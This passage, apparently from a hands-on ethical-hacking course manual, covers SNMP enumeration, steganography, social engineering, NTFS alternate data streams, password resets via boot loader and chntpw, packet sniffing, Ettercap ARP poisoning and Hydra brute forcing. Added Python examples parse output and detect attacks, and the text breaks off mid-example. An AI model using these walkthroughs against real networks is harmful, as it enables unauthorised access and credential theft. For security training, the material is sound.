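    + ["%d 10.0.0.9 > 192.168.1.10:%d [FPU]" % (100 + p, p) for p in range(1, 11)]
    + ["200 192.168.1.20 > 192.168.1.10:80 [S]",
       "201 192.168.1.20 > 192.168.1.10:443 [S]"]
)

if __name__ == "__main__":
    for finding in detect_port_scans(parse_log(SAMPLE_LOG)):
        print("%(src)s: %(scan_type)s across %(distinct_ports)d ports" % finding)
```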

Enumeration:

Objectives: At the end of this module you should be able to


Enumerate systems on the network.

Effectively use SNMP protocol to gather information of systems and network.

Description:

Enumeration means making an ordered list of items; here we enumerate the devices/nodes in a network, which makes the later penetration phase easier.

SNMP Enumeration:

SNMP is based on UDP, a stateless protocol, and is therefore susceptible to IP spoofing. In addition, SNMP has a weak authentication system for both private and public community strings. These community strings are passed unencrypted on the network and are often left in their default state: "private" and "public".

Examining information from a Windows host running SNMP can be done by using the following command:

snmpwalk -c public -v1 <ip address> 1

To view the system info we can use the following arguments to snmpwalk:

root@bt:~# snmpwalk -c public -v1 192.168.0.110 SNMPv2-MIB::sysDescr.0

SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 15 Model 4 Stepping 8 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)

Enumerating Windows Users:

BT-ARKZ # snmpwalk -c public -v1 192.168.0.110 1.3 |grep 77.1.2.25 |cut -d" " -f4

"Guest"

"Administrator"

"IUSR_WIN2KSP4"

"IWAM_WIN2KSP4"

"TsInternetUser"

"NetShowServices"

Enumerating Windows Services:

BT-ARKZ # snmpwalk -c public -v1 192.168.0.110 | grep hrSWRunName | cut -d " " -f4

"System"

"System"

"smss.exe"

"csrss.exe"

"snmp.exe"

Enumerating TCP ports:

BT-ARKZ # snmpwalk -c public -v1 192.168.0.110 1 | grep tcpConnState | cut -d"." -f6 | sort -nu

21

25

80

Having seen some examples above, there are lots of other interesting arguments or commands that can be given to snmpwalk to enumerate many more things. But when we have BackTrack we need not worry about remembering all that stuff.

You can use snmpenum.pl and snmpcheck.pl to enumerate all available info.
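The Python script below is an added example (not from the manual or BackTrack) that does in one pass what the grep/cut pipelines above do, reading saved snmpwalk output: it pulls the system description, the LanManager user list (decoding the OID index to confirm each name), the running process names and the listening TCP ports; the snmpwalk lines and function names are constructed for this example after the real net-snmp output format.

```python
"""Extract what an SNMPv1 'public' walk of a Windows host reveals, from saved snmpwalk output."""
import re

# "<oid> = <TYPE>: <value>" is the line format net-snmp's snmpwalk prints.
LINE_RE = re.compile(r"^(?P<oid>\S+) = (?P<type>[A-Za-z0-9-]+): ?(?P<value>.*)$")
# LanManager MIB branch holding local accounts (the manual greps for 77.1.2.25).
LANMAN_USERS = "enterprises.77.1.2.25."


def parse_snmpwalk(text):
    """Yield (oid, type, value); surrounding quotes are stripped from STRING values."""
    for line in text.splitlines():
        match = LINE_RE.match(line.strip())
        if not match:
            continue
        value = match.group("value")
        if match.group("type") == "STRING" and len(value) >= 2 and value[0] == value[-1] == '"':
            value = value[1:-1]
        yield match.group("oid"), match.group("type"), value


def decode_lanman_index(index):
    """'5.71.117.101.115.116' -> 'Guest': the table index is the name length plus ASCII codes."""
    parts = [int(p) for p in index.split(".")]
    length, codes = parts[0], parts[1:]
    if len(codes) != length:
        raise ValueError("index claims %d chars but carries %d" % (length, len(codes)))
    return "".join(chr(c) for c in codes)


def enumerate_windows_host(text):
    """Collect the facts the manual's grep/cut pipelines extract, from one saved walk."""
    info = {"sysdescr": None, "users": [], "processes": [], "listening_tcp_ports": set()}
    for oid, _type, value in parse_snmpwalk(text):
        if oid.endswith("sysDescr.0"):
            info["sysdescr"] = value
        elif LANMAN_USERS in oid:
            # The column part "1.1." precedes the index; decode it and cross-check the STRING.
            index = oid.split(LANMAN_USERS, 1)[1].split(".", 2)[2]
            if decode_lanman_index(index) != value:
                raise ValueError("OID index does not match account name %r" % value)
            info["users"].append(value)
        elif "hrSWRunName." in oid:
            info["processes"].append(value)  # the cut -f4 pipeline truncates names with spaces
        elif "tcpConnState." in oid and value.startswith("listen"):
            # Index is localAddr(4 octets).localPort.remAddr(4 octets).remPort
            local_port = int(oid.split("tcpConnState.", 1)[1].split(".")[4])
            info["listening_tcp_ports"].add(local_port)
    info["listening_tcp_ports"] = sorted(info["listening_tcp_ports"])
    return info


# Constructed snmpwalk output, modelled on what net-snmp prints for a Windows 2000 host.
SAMPLE_SNMPWALK = """\
SNMPv2-MIB::sysDescr.0 = STRING: Hardware: x86 Family 15 Model 4 Stepping 8 AT/AT COMPATIBLE - Software: Windows 2000 Version 5.0 (Build 2195 Uniprocessor Free)
SNMPv2-MIB::sysName.0 = STRING: WIN2KSP4
SNMPv2-SMI::enterprises.77.1.2.25.1.1.5.71.117.101.115.116 = STRING: "Guest"
SNMPv2-SMI::enterprises.77.1.2.25.1.1.13.65.100.109.105.110.105.115.116.114.97.116.111.114 = STRING: "Administrator"
HOST-RESOURCES-MIB::hrSWRunName.1 = STRING: "System Idle Process"
HOST-RESOURCES-MIB::hrSWRunName.4 = STRING: "System"
HOST-RESOURCES-MIB::hrSWRunName.120 = STRING: "smss.exe"
HOST-RESOURCES-MIB::hrSWRunName.900 = STRING: "snmp.exe"
TCP-MIB::tcpConnState.0.0.0.0.21.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.25.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.0.0.0.0.80.0.0.0.0.0 = INTEGER: listen(2)
TCP-MIB::tcpConnState.192.168.0.110.80.192.168.0.5.1055 = INTEGER: established(5)
"""

if __name__ == "__main__":
    for key, val in enumerate_windows_host(SAMPLE_SNMPWALK).items():
        print("%-20s %s" % (key, val))
```

Run it over a walk of your own hosts to see exactly what a default community string exposes; the remedy is to change or disable the v1/v2c communities, restrict SNMP to management addresses, and prefer SNMPv3 with authentication and privacy.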


Steganography: Hiding Data within Data

Objectives: At the end of this module you should be able:

To understand steganography and hide data inside images. To comfortably use tools like Image Hide, Invisible Secrets, etc.

Description:

Steganography is the technique of writing hidden information within images, audio or video. The word steganography is of Greek origin and means "concealed writing". This technique is used by hackers, terrorists, etc. to communicate with each other without being caught, and the technique makes sure that the data is well hidden. There are many techniques in use, but the most famous or commonly used is hiding data in an image file. We will be seeing how it is actually done.

We will be using software known as Invisible Secrets 2.1

PART 1 (HIDING DATA)

Step 1: Install the software and run it

Step 2: Click on next.

Step 3:

Select the option as shown in the screenshot (not reproduced) and click on next.

Step 4:

Select the image in which you want to hide data. In the screenshot I have selected an image, original.jpg. Then click on next.

Step 5:

Click on add files and select the file which you want to hide in the picture. As you can see in the screenshot, I have selected a text file "This is secret.txt". You can also select multiple files. After selecting, click next.

Step 6:

You will have to provide an encryption password, then click next.

Step 7:

Now give the target file a name; this file will contain your hidden text. As you can see in the screenshot, I have named it "stenoimage". Now click on next.

Step 8:

As you can see, a new image file has been created with the name "stenoimage". It's the same as the original file with no changes... or is it?

Click on next and then, on the next window, click finish.

So far we have managed to hide a text file in an image. In the next part we will extract the hidden data.

EXTRACTING HIDDEN DATA FROM THE IMAGE

Step 1:

After clicking on finish you will end up on this screen (screenshot not reproduced).

This time select the 2nd option to extract the secret data from the image. Click on next.

Step 2:

Select the image from which you want to extract the hidden file, in our case "stenoimage.j
pg", then click on next.

Step 4: Input the password that you provided earlier.

As you can see in the screenshot, that's our secret file. Now choose the location where you want to extract it and click on next, and your secret file will be visible.


Exercises

i. Try to extract text from a picture without using steganography tools.
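As an added example (not from the manual or Invisible Secrets), the Python code below implements the least-significant-bit technique that image steganography tools are built on, applied to a constructed 8-bit pixel buffer, so that the description above and the exercise of extracting hidden text without a steganography tool can be worked through by hand; the 4-byte length header is this example's own layout, not the Invisible Secrets format, and with a real picture you would pass the decoded pixel samples instead of the constructed buffer.

```python
"""LSB steganography on raw 8-bit pixel samples: embed, extract, and measure the change."""

HEADER_BYTES = 4  # payload length, big-endian, stored ahead of the payload


def _to_bits(data):
    """Yield the bits of `data`, most significant bit of each byte first."""
    for byte in data:
        for shift in range(7, -1, -1):
            yield (byte >> shift) & 1


def _from_lsbs(samples, start, count):
    """Rebuild `count` bytes from the LSBs of samples[start:start + 8 * count]."""
    out = bytearray()
    for b in range(count):
        value = 0
        for k in range(8):
            value = (value << 1) | (samples[start + 8 * b + k] & 1)
        out.append(value)
    return bytes(out)


def embed(cover, payload):
    """Return a copy of `cover` whose LSBs carry len(payload) followed by payload."""
    message = len(payload).to_bytes(HEADER_BYTES, "big") + payload
    needed = 8 * len(message)
    if needed > len(cover):
        raise ValueError("cover too small: %d samples needed, %d available" % (needed, len(cover)))
    stego = bytearray(cover)
    for i, bit in enumerate(_to_bits(message)):
        stego[i] = (stego[i] & 0xFE) | bit  # each sample moves by at most 1
    return bytes(stego)


def extract(stego):
    """Recover the payload; raises ValueError when no plausible length header is present."""
    if len(stego) < 8 * HEADER_BYTES:
        raise ValueError("buffer too small to hold a header")
    length = int.from_bytes(_from_lsbs(stego, 0, HEADER_BYTES), "big")
    if 8 * (HEADER_BYTES + length) > len(stego):
        raise ValueError("length field %d exceeds capacity: no hidden payload" % length)
    return _from_lsbs(stego, 8 * HEADER_BYTES, length)


def max_sample_change(cover, stego):
    """Largest per-sample difference; 1 for LSB embedding, which is why the eye cannot tell."""
    return max(abs(a - b) for a, b in zip(cover, stego))


# Constructed cover: a 32x32 8-bit greyscale gradient (1024 samples); no image file needed.
COVER = bytes(range(256)) * 4
SECRET = b"This is secret"

if __name__ == "__main__":
    stego = embed(COVER, SECRET)
    print(extract(stego), "max sample change:", max_sample_change(COVER, stego))
```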

Module Four: Social Engineering

Social Engineering is generally a hacker's clever manipulation of the natural human tendency to trust.

Objectives:

• Social engineering concepts

• Categories of social engineering

• Techniques for social engineering

• Approach

• Scenarios

• Best practices

• Summary

Social Engineering Concepts:

Social engineering is a term that describes a non-technical kind of intrusion that relies heavily on human interaction, tricking people into breaking normal security procedures. Social engineering is generally a hacker's clever manipulation of the natural human tendency to trust. The hacker's goal is to obtain information that will allow him/her to gain unauthorized access to a valued system and the information that resides on that system.

Social Engineering Categories:

• Human based social engineering

– Telephonic

– Persuasion

– Dumpster diving

– Shoulder surfing

• Technology based social engineering

– Phishing

– Misleading programs

– Spoofed mails/Spam

Human Based Social Engineering

Social engineering at the human level generally exploits trust and face-to-face interaction. Social engineering at the psychological level can take place at multiple levels:

Gaining sympathy

Playing games (I am ok You are ok)

Manipulating thoughts

Giving an impression


Calculated inducement of feelings over time

Exploiting factors like above to reach an objective.

Using Technology for Social Engineering

Hackers use a variety of techniques to social engineer using technology:

Masquerading as a customer in a support chat for assistance

Sending fake e-mails containing bogus product queries

Sending links to fake websites

Phishing common websites of interest

Creating fake blogs with misleading news/information

Creating fake profiles on social networking sites like Orkut.

Cheating people by pretending to be a helpless girl on chat and asking for money (cyber-begging).

Pretending to be a customer support engineer.

Social Engineering by Phone

The most prevalent type of social engineering attack is conducted by phone.

Help desks are particularly prone to this type of attack.

Hackers are able to pretend they are calling from inside the corporation by playing tricks on the PBX or the company operator.

Help desks are particularly vulnerable because they are in place specifically to help.

Dumpster Diving

Dumpster diving, also known as trashing, is another popular method of social engineering.

A huge amount of information can be collected through company dumpsters.

The information can be company phone books, organizational charts, company policy manuals, events and vacations, system manuals, printouts of sensitive data or login names and passwords, printouts of source code, disks and tapes, company letterhead and outdated hardware.

Module Five: Taking on the system

NTFS Alternate Streams:

Objectives: At the end of this module you should be able:

To create and read an alternate data stream.

To hide different files using the ADS technique.

Description:

An NTFS stream, or Alternate Data Stream (ADS), is a feature only available in the NT file system. Using this feature any file of the desired length can be hidden under another file, such that the true properties of the hidden file are never shown to the user.

Unlike the Hidden attribute available from the properties tab of a file, the ADS can be used to completely hide the file from the file system.

Streams are not limited in size and there can be more than one stream linked to a file.

Creating an NTFS stream: (screenshot not reproduced)

To retrieve the hidden file contents: (screenshot not reproduced)

Hidden.txt file is not visible (screenshot not reproduced)

Alternate data streams can further be used in creating malware, which may use a simple batch script, such as the one shown later in this module, that automatically creates an ADS file.

Physical Access Attacks:

Objectives: At the end of this module you should be able to:

Reset Windows Passwords.

Reset Linux Passwords.

Reset Linux Passwords:

Description:

A Linux machine can be made to boot as the root user if we can modify the boot loader at the start of the machine. Linux may use either the LILO or the GRUB boot loader to boot the operating system.

Either boot loader will allow us to modify the boot options so that we boot into single user mode.

Booting into Linux single user mode:

At the boot loader, instead of selecting the OS to boot, type the letter 'e' to edit the line before booting.

Ubuntu by default gives you an option to boot into recovery mode, from which a root shell can be obtained.

The boot loader will then present you with a screen to edit the kernel boot options, where these changes are to be made.

(ADS batch file referred to in the NTFS Alternate Streams section above: it creates a link to the named stream of a file, opens it, and removes the link.)

@ECHO OFF
REM This batch file starts or opens a
REM stream. Call with first param as filename
REM and second param as stream name
MKLINK temp_%2 %1:%2
START temp_%2
DEL temp_%2

Find the line which starts with the word linux and append to it the word "single".

(OR)

Append init=/bin/bash to the line.

Once the changes are done, press 'b' (or, in some cases, CTRL + X) to boot with the changes.

Reset Windows Passwords:

Windows stores local usernames in the Security Accounts Manager (SAM) database as well as in other

places. Please read the following article if you are not familiar with the SAM:

http://www.microsoft.com/technet/archive/winntas/tips/winntmag/storpass.mspx?mfr=true

The SAM file can be found in %SYSTEMROOT%\system32\config and is inaccessible for reading, copying, or writing while Windows is running. The solution is to reboot the system with a live OS which makes the file system readable.

In this example we will be looking at a tool called chntpw which is used to modify the contents of the SAM file.

Using chntpw

Instructions for using chntpw:

Boot a live OS such as BackTrack on the Windows machine.

Mount the file system on which the operating system is installed.

Give the path of the SAM file to chntpw.

The tool will prompt to change the password or to blank it.

Choose the desired option and the tool will save the change accordingly.

Reboot the machine into Windows; you should be able to log in without any difficulty.

This screenshot shows the modification of a sample SAM and SYSTEM file.


TCPDUMP (Network Analyzers)

Objectives: At the end of this module you should be able to:

To intercept data from networks and monitor it

To filter necessary packets.

Description:

Network analyzers are used to monitor packet data in a network for the purpose of troubleshooting network-related problems. In the field of security, however, these tools and techniques have greater importance, as they can be used to compromise the security of networks and systems.


Basic Usage

Based on the kind of traffic we are looking for, we can use a different combination of options to

tcpdump, as can be seen below:

1. Basic communication // see the basics without many options

# tcpdump -nS

2. Basic communication (very verbose) // see a good amount of traffic, with verbosity and no name help

# tcpdump -nnvvS

3. A deeper look at the traffic // adds -X for payload but doesn't grab any more of the packet

# tcpdump -nnvvXS

4. Heavy packet viewing // the final "s" increases the snap length, grabbing the whole packet

# tcpdump -nnvvXSs 1514

Here's a capture of exactly two (-c2) ICMP packets (a ping and pong) using some of the options

described above. Notice how much we see about each packet.

Common Syntax

Expressions allow you to trim out various types of traffic and find exactly what you're looking for.

Mastering the expressions and learning to combine them creatively is what makes one truly powerful

with tcpdump.

root # tcpdump -nnvXSs 0 -c2 icmp
tcpdump: listening on eth0, link-type EN10MB (Ethernet),
23:11:10.370321 IP (tos 0x20, ttl 48, id 34859, offset 0, flags [none], length: 84) 69.254.213.43 > 72.21.34.42: icmp 64: echo request seq 0
        0x0000:  4520 0054 882b 0000 3001 7cf5 45fe d52b  E..T.+..0.|.E..+
        0x0010:  4815 222a 0800 3530 272a 0000 25ff d744  H."*..50'*..%..D
        0x0020:  ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213  .^..............
        0x0030:  1415 1617 1819 1a1b 1c1d 1e1f 2021 2223  .............!"#
        0x0040:  2425 2627 2829 2a2b 2c2d 2e2f 3031 3233  $%&'()*+,-./0123
        0x0050:  3435 3637                                4567
23:11:10.370344 IP (tos 0x20, ttl 64, id 35612, offset 0, flags [none], length: 84) 72.21.34.42 > 69.254.213.43: icmp 64: echo reply seq 0
        0x0000:  4520 0054 8b1c 0000 4001 6a04 4815 222a  E..T....@.j.H."*
        0x0010:  45fe d52b 0000 3d30 272a 0000 25ff d744  E..+..=0'*..%..D
        0x0020:  ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213  .^..............
        0x0030:  1415 1617 1819 1a1b 1c1d 1e1f 2021 2223  .............!"#
        0x0040:  2425 2627 2829 2a2b 2c2d 2e2f 3031 3233  $%&'()*+,-./0123
        0x0050:  3435 3637                                4567
2 packets captured
2 packets received by filter
0 packets dropped by kernel
root #
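To make sense of the -X hex dump above, it helps to decode it by hand once. The following is an added example, not code from the manual or from tcpdump: the hex words are copied from the capture above, and the parser, the RFC 1071 checksum routine and the field names are mine. It decodes the IPv4 and ICMP echo headers, verifies both checksums (a valid header re-sums to zero when the checksum field is included) and prints a summary line in the spirit of tcpdump -v.

```python
"""Decode the two ICMP packets from the tcpdump -X capture on this page.

Added example, not part of the manual. The hex words are copied from the
capture above; the parser and checksum logic are not tcpdump's code.
"""
import struct
from ipaddress import IPv4Address

# Hex words copied from the `tcpdump -nnvXSs 0 -c2 icmp` capture above
# (echo request followed by echo reply, 84 bytes each).
ECHO_REQUEST_HEX = (
    "4520 0054 882b 0000 3001 7cf5 45fe d52b "
    "4815 222a 0800 3530 272a 0000 25ff d744 "
    "ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213 "
    "1415 1617 1819 1a1b 1c1d 1e1f 2021 2223 "
    "2425 2627 2829 2a2b 2c2d 2e2f 3031 3233 "
    "3435 3637"
)
ECHO_REPLY_HEX = (
    "4520 0054 8b1c 0000 4001 6a04 4815 222a "
    "45fe d52b 0000 3d30 272a 0000 25ff d744 "
    "ae5e 0500 0809 0a0b 0c0d 0e0f 1011 1213 "
    "1415 1617 1819 1a1b 1c1d 1e1f 2021 2223 "
    "2425 2627 2829 2a2b 2c2d 2e2f 3031 3233 "
    "3435 3637"
)

ICMP_TYPES = {0: "echo reply", 8: "echo request"}


def internet_checksum(data: bytes) -> int:
    """RFC 1071 ones-complement sum over 16-bit words (odd trailing byte zero-padded)."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:                      # fold carries back into 16 bits
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF


def parse_ipv4_icmp(raw: bytes) -> dict:
    """Decode the IPv4 header and, for protocol 1, the ICMP echo header after it."""
    (version_ihl, tos, total_len, ident, flags_frag,
     ttl, proto, _hdr_csum, src, dst) = struct.unpack("!BBHHHBBH4s4s", raw[:20])
    ihl = (version_ihl & 0x0F) * 4
    if version_ihl >> 4 != 4 or ihl < 20:
        raise ValueError("not an IPv4 packet")
    if len(raw) < total_len:
        raise ValueError("truncated packet: was the snap length (-s) too small?")
    info = {
        "tos": tos, "ttl": ttl, "id": ident, "length": total_len,
        "flags": flags_frag >> 13, "offset": (flags_frag & 0x1FFF) * 8,
        "proto": proto,
        "src": str(IPv4Address(src)), "dst": str(IPv4Address(dst)),
        # Re-summing the header with its checksum field included gives 0 when valid.
        "ip_checksum_ok": internet_checksum(raw[:ihl]) == 0,
    }
    if proto == 1:
        icmp = raw[ihl:total_len]
        itype, code, _csum, echo_id, seq = struct.unpack("!BBHHH", icmp[:8])
        info.update({
            "icmp_type": ICMP_TYPES.get(itype, str(itype)),
            "icmp_code": code, "icmp_id": echo_id, "icmp_seq": seq,
            "icmp_len": len(icmp),
            "icmp_checksum_ok": internet_checksum(icmp) == 0,
        })
    return info


def parse_hex_dump(words: str) -> dict:
    """Accept the hex words as tcpdump -X prints them (whitespace ignored)."""
    return parse_ipv4_icmp(bytes.fromhex(words.replace(" ", "")))


def summarize(info: dict) -> str:
    """One line in the spirit of tcpdump -v output."""
    return ("IP (tos 0x%02x, ttl %d, id %d, length: %d) %s > %s: icmp %d: %s seq %d"
            % (info["tos"], info["ttl"], info["id"], info["length"], info["src"],
               info["dst"], info["icmp_len"], info["icmp_type"], info["icmp_seq"]))


if __name__ == "__main__":
    for hexwords in (ECHO_REQUEST_HEX, ECHO_REPLY_HEX):
        p = parse_hex_dump(hexwords)
        print(summarize(p), "| checksums ok:", p["ip_checksum_ok"] and p["icmp_checksum_ok"])
```

The struct format strings follow the header layouts in RFC 791 and RFC 792; the same skeleton extends to TCP and UDP by dispatching on the protocol field, and a failed checksum is the first thing to look at when a capture taken with a small -s value seems corrupt.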


There are three main types of expression: type, dir, and proto.

Type options are host, net, and port. Direction is indicated by dir, and there you can have src, dst, src or dst, and src and dst. Here are a few that you should definitely be comfortable with:

host // look for traffic based on IP address (also works with hostname if you're not using -n)

# tcpdump host 1.2.3.4

src, dst // find traffic from only a source or destination (eliminates one side of a host conversation)

# tcpdump src 2.3.4.5

# tcpdump dst 3.4.5.6

net // capture an entire network using CIDR notation

# tcpdump net 1.2.3.0/24

proto // works for tcp, udp, and icmp. Note that you don't have to type proto

# tcpdump icmp

port // see only traffic to or from a certain port

# tcpdump port 3389

src, dst port // filter based on the source or destination port

# tcpdump src port 1025

# tcpdump dst port 389

src/dst, port, protocol // combine all three

# tcpdump src port 1025 and tcp

# tcpdump udp and src port 53

You also have the option to filter by a range of ports instead of declaring them individually, and to

only see packets that are above or below a certain size.

Port Ranges // see traffic to any port in a range

# tcpdump portrange 21-23

Packet Size Filter // only see packets below or above a certain size (in bytes)

# tcpdump less 32

# tcpdump greater 128

[ You can also compare the packet length (len) directly with the symbols for less than, greater than, less than or equal and greater than or equal. Quote the expression, otherwise the shell treats > and < as redirections instead of passing them to tcpdump. ]

// filtering for size using symbols

# tcpdump 'len > 32'

# tcpdump 'len <= 128'

Writing to a File

Tcpdump allows you to send what you're capturing to a file for later use using the -w option, and then to read it back using the -r option. This is an excellent way to capture raw traffic and then run it through various tools later.

Capture all Port 80 Traffic to a File

# tcpdump -s 1514 port 80 -w capture_file


Then, at some point in the future, you can read the traffic back in like so:

Read Captured Traffic back into tcpdump

# tcpdump -r capture_file

Wireshark

Wireshark is a free and open-source packet analyzer. It is used for network troubleshooting, analysis,

software and communications protocol development, and education.

Steps to Use the program:

Packet capture is started by selecting the appropriate interface from the interface list, as visible in the picture above.

Packets are captured as soon as the interface is selected; the next image shows how the packets are displayed.

Packet information can be viewed by double clicking on a specific packet.

Wireshark offers a great deal of filters which help sort out the necessary packets to be viewed.

To apply a filter, type it into the filter box located below the menu bar. Pre-built expressions can also be used; they can be accessed by clicking on Expressions beside the filter box.


As we can see above, there are a great many packets in this window. They can be recognized by looking at the protocol column, which shows whether a packet is HTTP, raw TCP, DNS or something else. Wireshark makes this easy by colour-coding each protocol: the one in blue is a DNS packet and the green one is a TCP or TCP/HTTP packet.

Since thousands of packets are intercepted every second, locating a particular packet among them is a tedious job. This is where the filter feature comes in handy.

Wireshark comes with a lot of built-in filters and also gives us the freedom to write our own. For example, if we want to look at packets coming from a specific source address, the filter would be:

Filter: ip.src==10.42.43.38

< More Examples >

Filter: ip.src == 10.42.43.38 && ip.dst == 10.42.43.1 (show packets from the source IP to the destination IP)

Filter: http (show only HTTP packets)

Filter: tcp || http (show TCP or HTTP packets, or both)

Note that protocol names in Wireshark display filters are written in lower case.

Apart from looking at protocol information, the best feature of Wireshark is that we can re-create, or view the source of, an entire web page, binary or any other file that is being transmitted over the network.


Following a Packet Sequence:

Click on Follow TCP Stream as shown above to look at the packets of one conversation in sequence.

The Follow TCP Stream selection lands you in a window like the one shown below. This window shows the combined output of all the packets selected by a particular filter; by default it uses the IP addresses as the filter and shows all data associated with them.

The information shown in red is the data received and the information in blue is what is being sent to the server.

So by sniffing the network, any unencrypted information can be intercepted and viewed through the process above. By using specific filters and combining the data gathered from the windows above, we can re-create the packet contents to rebuild a binary file.


Exercises:

• Try to capture only HTTP packets using tcpdump/Wireshark.

• Capture the packets containing the login credentials of a website.

• Try to capture packets from a chat messenger/IRC chat.

Arp Spoofing (Ettercap)

Objectives: At the end of this module you should be able to:

Attack the ARP protocol and capture all outgoing and incoming packets of a system.

Be comfortable using the Ettercap tool.

Description:

Ettercap is a comprehensive suite for man-in-the-middle attacks. It features sniffing of live connections, content filtering on the fly and many other interesting tricks. It supports active and passive dissection of many protocols and includes many features for network and host analysis.

In order to poison an ARP cache, Ettercap first scans (Hosts->Scan for hosts) the entire netmask; clicking on Hosts->Hosts then provides the list of active members of the network.

• On the Targets->Show Targets screen Ettercap shows the list of hosts; targets are selected by choosing the IP and clicking on Add to Target.

• The attack is started by clicking MITM->Arp poisoning, as shown below.

• Click on Sniff remote connections when prompted to sniff packets from the victim machine.

• Once the Arp cache is poisoned the packets captured can be viewed on any packet sniffer

such as Wireshark.
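What the poisoning above looks like from the defender's side is a sudden change in the IP-to-MAC binding of the gateway and of the victim, with one MAC answering for several addresses. The following is an added example, not code from the manual or from Ettercap: a small monitor in the style of arpwatch, written in Python, run over a constructed excerpt of tcpdump's ARP output (the `HH:MM:SS.ffffff ARP, Reply <ip> is-at <mac>, length 28` line format printed with -n; all addresses are placeholders, not lab hosts). It records the first binding seen for each IP, or a trusted table you supply, and reports every reply that contradicts it.

```python
"""ARP cache poisoning detector over tcpdump ARP reply lines.

Added example, not part of the manual or of Ettercap. The sample lines are
constructed; the addresses are placeholders.
"""
import re
from collections import defaultdict

# Constructed sample in the format tcpdump -n uses for ARP traffic. The first
# three replies establish the honest bindings; then a second MAC
# (aa:bb:cc:dd:ee:ff) starts claiming both the gateway .1 and the host .10,
# which is exactly what a MITM ARP poisoner looks like on the wire.
SAMPLE_LINES = """\
10:00:00.000100 ARP, Reply 192.168.56.1 is-at 00:11:22:33:44:01, length 28
10:00:00.500200 ARP, Reply 192.168.56.10 is-at 00:11:22:33:44:10, length 28
10:00:01.000300 ARP, Reply 192.168.56.20 is-at 00:11:22:33:44:20, length 28
10:00:05.000400 ARP, Request who-has 192.168.56.20 tell 192.168.56.10, length 28
10:00:05.000500 ARP, Reply 192.168.56.1 is-at aa:bb:cc:dd:ee:ff, length 28
10:00:05.100600 ARP, Reply 192.168.56.10 is-at aa:bb:cc:dd:ee:ff, length 28
10:00:06.000700 ARP, Reply 192.168.56.1 is-at aa:bb:cc:dd:ee:ff, length 28
"""

ARP_REPLY = re.compile(
    r"^(?P<ts>\d{2}:\d{2}:\d{2}\.\d+) ARP, Reply (?P<ip>[\d.]+) is-at "
    r"(?P<mac>(?:[0-9a-fA-F]{2}:){5}[0-9a-fA-F]{2})"
)


def parse_arp_replies(text):
    """Yield (timestamp, ip, mac) for each ARP reply line; requests are ignored."""
    for line in text.splitlines():
        m = ARP_REPLY.match(line)
        if m:
            yield m.group("ts"), m.group("ip"), m.group("mac").lower()


class ArpMonitor:
    """Remembers the first IP->MAC binding seen (or a trusted table) and reports
    every reply that contradicts it, like arpwatch's "flip flop" alert."""

    def __init__(self, trusted=None):
        self.bindings = dict(trusted or {})      # ip -> mac
        self.ips_per_mac = defaultdict(set)      # mac -> {ip, ...}
        self.alerts = []

    def observe(self, ts, ip, mac):
        self.ips_per_mac[mac].add(ip)
        known = self.bindings.get(ip)
        if known is None:                        # first time we hear of this IP
            self.bindings[ip] = mac
            return None
        if known == mac:
            return None
        alert = "%s ARP binding for %s changed %s -> %s" % (ts, ip, known, mac)
        claimed = self.ips_per_mac[mac]
        if len(claimed) > 1:
            # One interface answering for several addresses is the MITM signature.
            alert += " (MAC now claims %d addresses: %s)" % (
                len(claimed), ", ".join(sorted(claimed)))
        self.alerts.append(alert)
        return alert


def scan(text, trusted=None):
    """Run the monitor over captured tcpdump output and return the alert list."""
    mon = ArpMonitor(trusted)
    for ts, ip, mac in parse_arp_replies(text):
        mon.observe(ts, ip, mac)
    return mon.alerts


if __name__ == "__main__":
    for alert in scan(SAMPLE_LINES):
        print(alert)
```

Feeding it a trusted table of the gateway's real MAC (the `trusted` argument) removes the dependence on the first reply being honest; on a real switch, static ARP entries for the gateway or Dynamic ARP Inspection on the switch are the corresponding preventive controls.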


Arp Poisoning

Exercises:

• Perform an ARP attack on a local switch; this attack can result in total collapse of the

network. (You have been warned!!)


Module Six: Attacking passwords


PASSWORD HACKING:

Objectives: At the end of this module you should be able to:

Crack passwords using any of the three techniques: dictionary, brute-force, and hybrid attacks.

Crack MD5 and NTLM password hashes.

Description:

Password-based authentication is one of the weakest forms of user verification, the main reason being that most of the time the choice of password is left to the user (who, as you know, is the weakest part of the security chain).

Even if passwords are not user-created (if, for instance, they are generated randomly), the security of the password is still left to the user. It is surprisingly common for users to write their password on a sticky note and keep it under their keyboard. Unfortunately, corporate policies do not seem capable of enforcing password security to a satisfactory level.

HYDRA: Brute Force tool

As described by its authors, Hydra is the best-parallelized login hacker for Samba, FTP, POP3, IMAP,

Telnet, HTTP Auth, LDAP, NNTP, MySQL, VNC, ICQ, Socks5, PCNFS, Cisco, and more. Hydra includes

SSL support and is part of Nessus. Hydra supports a huge number of protocols and is probably the

most well-known password brute force tool.

Type hydra in a BackTrack console to see the many Hydra command line options


FTP brute forcing with hydra:

The picture above shows a successful HTTP password cracking run where username = admin and password = P@ssword1.

Open a console and type in hydra. Use "-l" to specify the user name if you are sure of it.

Use the "-P" option to specify the word list or password list.

Finally specify the target IP using "-V" and after that the protocol on which to attack.

-e ns does additional checks: "n" for null password, "s" try login as password.

-t TASKS run TASKS number of connects in parallel.

-f exit after the first found login/password pair.

-s PORT if the service is on a different port than the default, define it here.

-v/-V verbose mode / show login+password for each attempt.
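The -t option above runs many connection attempts in parallel, and that burst of failures from one source against many user names is exactly the pattern a defender should alert on. The following is an added example, not code from the manual or from Hydra: a Python detector run over a constructed auth.log excerpt in sshd's "Failed password" / "Accepted password" line format (host, user names and addresses are placeholders). It keeps a sliding window of failures per source, raises one alert when the count inside the window reaches a threshold, and raises a second, more serious alert if a login from that source then succeeds.

```python
"""Brute-force login detector over sshd log lines.

Added example, not part of the manual or of Hydra. The log excerpt is
constructed; names and addresses are placeholders.
"""
import re
from collections import defaultdict, deque
from datetime import datetime

# Constructed auth.log excerpt. 10.0.0.5 hammers the service with several user
# names within a few seconds, the way a parallel login cracker does, and then
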